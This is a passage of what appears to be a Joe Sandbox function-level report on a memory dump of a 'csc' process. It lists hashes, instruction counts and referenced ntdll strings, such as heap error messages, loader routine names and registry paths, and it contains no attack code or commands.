Instruction ID: c08f95b37a4b3dfad42b146ace86c00781e9470283529bb372079ba054e5db2c
Opcode Fuzzy Hash: c30cc08547a1edb854cb2d6da331fa936cf8393534d5af714e66438474654686
Instruction Fuzzy Hash: 65F18A70700609DFDB15CF68C998F6ABBBAFB44304F1485AAE4169B391D734E981CF91

Function 05961460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05961728
HEAP[%wZ]: , xrefs: 05961712
HEAP: , xrefs: 05961596

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: dbbf43c115265ace474bc3503249a1be5b65cecc352b7d86a7b113cbc814889f
Instruction ID: 649986eaf03e1a3a0e7049ea339d62a9c622823a16f85d0449d9a3aa7a0f15f7
Opcode Fuzzy Hash: dbbf43c115265ace474bc3503249a1be5b65cecc352b7d86a7b113cbc814889f
Instruction Fuzzy Hash: E1E1F670A042459FDB19CF28C495BBABBF6FF88310F18885EE896CB245D734E948DB50

Function 0596B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 0596B702
LdrResGetRCConfig Exit, xrefs: 0596B714
MUI, xrefs: 0596B6D8, 0596B7E7

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 37f76f64d86af05c08e08f60b4bd8122614d8c793fb5b46c9e4fedd4886f27c8
Instruction ID: 0a3fe04cfb7b902778e3c04afe39155b37df93829b80846bea43dc25155a522a
Opcode Fuzzy Hash: 37f76f64d86af05c08e08f60b4bd8122614d8c793fb5b46c9e4fedd4886f27c8
Instruction Fuzzy Hash: 71B1C131A186459FCB25CF59C980FADBBBABF44304F18886DE412EB784E734E944CB52

Function 059E368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

@, xrefs: 059E389F
\SystemRoot\system32\, xrefs: 059E3842
DelegatedNtdll, xrefs: 059E36CE

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: 6de1805d86ea6628454136a937d81f015eab0650b2179d1791e005ec5426eebb
Instruction ID: 1b3f5f2dcaff3f0c63d41b24f7eeba29d9dea201233a8864df7de2464186310f
Opcode Fuzzy Hash: 6de1805d86ea6628454136a937d81f015eab0650b2179d1791e005ec5426eebb
Instruction Fuzzy Hash: A3B1AE72618345AFE722DF54C885F6BBBE8BB84710F440D2AFA419B290D775F844CB92

Function 0595A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 059BC2E6
UseFilter, xrefs: 0595A1C1
\??\, xrefs: 059BC1E4

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: b2544f5853d9e5ad950a77d8d9ec1281a56c05a2842fe5b880812684609d6b66
Instruction ID: ce21113dc15bc19c04a76d47526e9e3462ab8864d3ac70bf5a611de200cdc2e2
Opcode Fuzzy Hash: b2544f5853d9e5ad950a77d8d9ec1281a56c05a2842fe5b880812684609d6b66
Instruction Fuzzy Hash: 52A179729112299BEB31DF64CD88BEAB7B9FF44710F1001EAE909A7250D775AE84CF50

Function 059F36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

LdrpResMapFile Exit, xrefs: 059F3727
@, xrefs: 059F3867
LdrpResMapFile Enter, xrefs: 059F3715

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: c4e552d7a7fbe45123a274b629b489caab42e11615f4eac9d95a7f7cd057ae48
Instruction ID: db6796ef2e8a9ec465e863fcd40e23823fdcb815e96ab690e6972cf4005a37d1
Opcode Fuzzy Hash: c4e552d7a7fbe45123a274b629b489caab42e11615f4eac9d95a7f7cd057ae48
Instruction Fuzzy Hash: CA819AB1608344AFE711DB24C844F6AB7E9FF85750F080D29FA919B390D778E944CBA2

Function 059E7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

VirtualAlloc, xrefs: 059E75FC
Objects=%4u, xrefs: 059E75EA
Objects>%4u, xrefs: 059E75D5

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: f81d404860040b09be9b2d693173b51b0764e78f32f5d97066700371a70a2a60
Instruction ID: d110db5629f414d60564d3f20617b21e13d32bf50fceece83dc25afe6ad772e0
Opcode Fuzzy Hash: f81d404860040b09be9b2d693173b51b0764e78f32f5d97066700371a70a2a60
Instruction Fuzzy Hash: 58915AB0E002459FDB19CFA8C484BADBBF1FF88714F14816AE905AB391E7759842CF95

Function 0596B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Enter, xrefs: 0596B465
LdrpResGetResourceDirectory Exit, xrefs: 0596B477
{, xrefs: 059C37B6

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: 4984b40817c108370b69ff6b6f513438c28050fe8bf7bc7063a2e357ed51a73c
Instruction ID: ad35858e04f9666e866afae91be98c62fba9dcc17cd9ae664158afdbdcc6decd
Opcode Fuzzy Hash: 4984b40817c108370b69ff6b6f513438c28050fe8bf7bc7063a2e357ed51a73c
Instruction Fuzzy Hash: 6F910371A04359CFDB21CF58C540BEE77B6FF05364F18899AE852EB290E3789A44CB91

Function 0599909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

%, xrefs: 059D5D3F
&, xrefs: 059D5CF8
@, xrefs: 05999148

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: e2c27ec2e6fb566a64c1fd34e35a7523064725b968c56d8425423b0bcdfb8706
Instruction ID: 50479a04447d94b76e77dde0a28374b1ef85ad41275dee1b7f7dac96fc42eae7
Opcode Fuzzy Hash: e2c27ec2e6fb566a64c1fd34e35a7523064725b968c56d8425423b0bcdfb8706
Instruction Fuzzy Hash: F271AF706093059FDB18DF28C584A6FFBEAFFC9618F10891DE49A47250D731E905CBA2

Function 05A3B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

TargetNtPath, xrefs: 05A3B82F
GlobalizationUserSettings, xrefs: 05A3B834
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 05A3B82A

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 9d3603dbf3ade1f4cfad4219dcf01d52e859e70321687feeb23ac83481c5c1c3
Instruction ID: 7dc7f7a0872eeaf69d8bfdbc2cfde942f97eaffaaf22b45355f8a11a611eb807
Opcode Fuzzy Hash: 9d3603dbf3ade1f4cfad4219dcf01d52e859e70321687feeb23ac83481c5c1c3
Instruction Fuzzy Hash: B0617E7294522DABDB21DF54CC8AF9AB7B9AF44714F0101E5B908A7250DB74AE80CFA0

Function 0595F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 059BE6C6
HEAP[%wZ]: , xrefs: 059BE6A6
HEAP: , xrefs: 059BE6B3

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 342024a004077dfe1c3d4be65722601622f166f1bf6714d3655f9a06ca9c913e
Instruction ID: f7edc88b1f04ee8be194fd76c765a1827ec1de823dad3d89434ae123007256d9
Opcode Fuzzy Hash: 342024a004077dfe1c3d4be65722601622f166f1bf6714d3655f9a06ca9c913e
Instruction Fuzzy Hash: E551E571704644EFE712DB68C949FAABBFDFF45324F040465EA4287291D774E950CB50

Function 0599C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 059D82DE
Failed to reallocate the system dirs string !, xrefs: 059D82D7
minkernel\ntdll\ldrinit.c, xrefs: 059D82E8

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 52d9ad525954b137d8e6fcc3b33d0703ef3505fe3c59773831aa2e992cdaadfa
Instruction ID: ba0fba8a8898efae2f8009e8d508ffebfcdc6113f9a404d2e37aae6ed1361169
Opcode Fuzzy Hash: 52d9ad525954b137d8e6fcc3b33d0703ef3505fe3c59773831aa2e992cdaadfa
Instruction Fuzzy Hash: DD41D675654304EBCB24EB68DC49F5FBBE8FF84660F44492AF94997250EB70E801CBA1

Function 0595758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 059BAFAB
Invalid address specified to %s( %p, %p ), xrefs: 059BAFCB
HEAP: , xrefs: 059BAFB8

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 826c25c137718fca270783068bfe354440253e6adb23335d9f3af9dd4a306a90
Instruction ID: d1ead55fc1308d078b9ce694db8fed31cf6e370c95ac9b6257cd36ada744f1ab
Opcode Fuzzy Hash: 826c25c137718fca270783068bfe354440253e6adb23335d9f3af9dd4a306a90
Instruction Fuzzy Hash: C5412470305240DFFF28CF9CC284BF977AAEF413A4F184469D8468B246D6B4D99AC752

Function 059916CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrtls.c, xrefs: 059D1B4A
LdrpAllocateTls, xrefs: 059D1B40
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 059D1B39

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: 86d9411486ee825cd8ba1548f54ba4ff07c558871c38b73cf289f8b470f8a372
Instruction ID: bb91980193545786f1de848307b6625cc411e349baf3f86f5a86c348517465de
Opcode Fuzzy Hash: 86d9411486ee825cd8ba1548f54ba4ff07c558871c38b73cf289f8b470f8a372
Instruction Fuzzy Hash: D2418B76E0060AEFDB15DFA8C845EAEFBF6FF88714F148519E406A7210D775A801DBA0

Function 05A1C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 05A1C212
@, xrefs: 05A1C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 05A1C1C5

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 563a365566a1e02c4b7db77a6a8e9bcede62c7f97553a61093cd425c89d946b5
Instruction ID: 34f61cd76cd2f3ea6614eb9c7ea5c5e1a89c687210d66c85125a7855f858aed8
Opcode Fuzzy Hash: 563a365566a1e02c4b7db77a6a8e9bcede62c7f97553a61093cd425c89d946b5
Instruction Fuzzy Hash: EA419072E40209EBDF11EBD4C995FEEB7BDBB44720F00406AE915BB240D774AE448BA4

Function 059E4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 059E4888
minkernel\ntdll\ldrredirect.c, xrefs: 059E4899
LdrpCheckRedirection, xrefs: 059E488F

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 9bcbc5d7de81540bc73f7aa4fe459864a662148fbba491f87df506a878cdf214
Instruction ID: 8b8816569ad801477a97026d7cd57e3dfa57f9888dc20cc7df20e7ab380df179
Opcode Fuzzy Hash: 9bcbc5d7de81540bc73f7aa4fe459864a662148fbba491f87df506a878cdf214
Instruction Fuzzy Hash: 97418E32A147519BCF22CE69D840E26BBEAFF89A50F0A0569FC5D9B251D735EC00CBD1

Function 059F4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 059F4225
LdrpResValidateFilePath Enter, xrefs: 059F4160
LdrpResValidateFilePath Exit, xrefs: 059F4172

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: e491cf8428a65d11aa487b95b688bb5f87f703b9be1037f46ea362f1a674d838
Instruction ID: 5f05feb93d12958380509e048408ead8b24760c1c5ad0129fee22f800c647189
Opcode Fuzzy Hash: e491cf8428a65d11aa487b95b688bb5f87f703b9be1037f46ea362f1a674d838
Instruction Fuzzy Hash: 42410431A042988BEF25DBE5C944BEEB7B9FF95340F14086ADA06EB791D7349901CB11

Function 059EB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 059EB632
@, xrefs: 059EB670
GlobalFlag, xrefs: 059EB68F

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: a71e59246db39bb3d7feb8a5ab88f53f42bca07c3521d5d2123c35cc1ff92ee9
Instruction ID: 0c47543db4c19ceaaf9717cdd4af5f88f9ea8f86f3d875993f8cf2732ab6e07c
Opcode Fuzzy Hash: a71e59246db39bb3d7feb8a5ab88f53f42bca07c3521d5d2123c35cc1ff92ee9
Instruction Fuzzy Hash: 08314CB1A00219AFDB11EFA4CC84EEEBBBDEF85754F140469EA05A7150D774AE04CBA4

Function 05991607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrtls.c, xrefs: 059D1A51
LdrpInitializeTls, xrefs: 059D1A47
DLL "%wZ" has TLS information at %p, xrefs: 059D1A40

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 200fee550684e08873b6ee5c52bc184f7db8d6290d07f36d63891e11ce14b0c7
Instruction ID: bef24c07b932f56f4422dcd23a9a34ea46e046bb94c4975c32089bd30ebad5ab
Opcode Fuzzy Hash: 200fee550684e08873b6ee5c52bc184f7db8d6290d07f36d63891e11ce14b0c7
Instruction Fuzzy Hash: 0D31D372E10346BBEF18DB5CC84AF6AB6BDBB88754F050529F505A7180DB70BD41E7A0

Function 059E20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 059E20F3
LdrpInitializationFailure, xrefs: 059E20FA
minkernel\ntdll\ldrinit.c, xrefs: 059E2104

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 963eb61665627b8429fb8e28df2cd2072668cc9b89b9e716028d19d061836395
Instruction ID: 01772b1f4b4f891518a60f911c0615fefceaf6af5c9e7ee5b19dc87c73623f6c
Opcode Fuzzy Hash: 963eb61665627b8429fb8e28df2cd2072668cc9b89b9e716028d19d061836395
Instruction Fuzzy Hash: B8F0A475A50308ABDB14DB48DD47FAD7B6CFB81A54F100055F6016B281D6B0AA41DA91

Function 059DE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 059DE75A
UEFI, xrefs: 059DE751

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: a81913b014ac7fa22690131c9ca48922408420cd42178e98b82a06d767c2a932
Instruction ID: 2358be9ad82f90f72574a8b4c56d25f82ea466dbd87906511562ae85c2517926
Opcode Fuzzy Hash: a81913b014ac7fa22690131c9ca48922408420cd42178e98b82a06d767c2a932
Instruction Fuzzy Hash: 22616C72E043189FDB24DFA8C980BAEFBB9FB44740F14846DE549EB251D735A940CB60

Function 0597F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 0597F860
$, xrefs: 0597F7F6

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: $$$
API String ID: 0-233714265
Opcode ID: 6f058729f5185e24b8cc973b20bb0aad580e1f68daeb369b2779ea6d2858de2c
Instruction ID: 5f367f89fae8fa56c36e22b480538be2e1b8d98f1ce2606da11209def8ab1da1
Opcode Fuzzy Hash: 6f058729f5185e24b8cc973b20bb0aad580e1f68daeb369b2779ea6d2858de2c
Instruction Fuzzy Hash: 5161CC71A0474DDBDB20DFA8C588FADBBB6FF88304F14446AD5066B640DB78B985CB90

Function 059604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0596063D
kLsE, xrefs: 05960540

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 8f313357f77ce9473a2da820f7a461f5a103fb52bbc8893f507fd42227153123
Instruction ID: 72a4dd791799b396f695074ea8f297d2e322238f5424b1cd44ebcbe2624e4c13
Opcode Fuzzy Hash: 8f313357f77ce9473a2da820f7a461f5a103fb52bbc8893f507fd42227153123
Instruction Fuzzy Hash: BE51BF71614742DFC724EF66C588AA7B7E9BF84304F04493EE99A87240E770E549CFA2

Function 059F35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

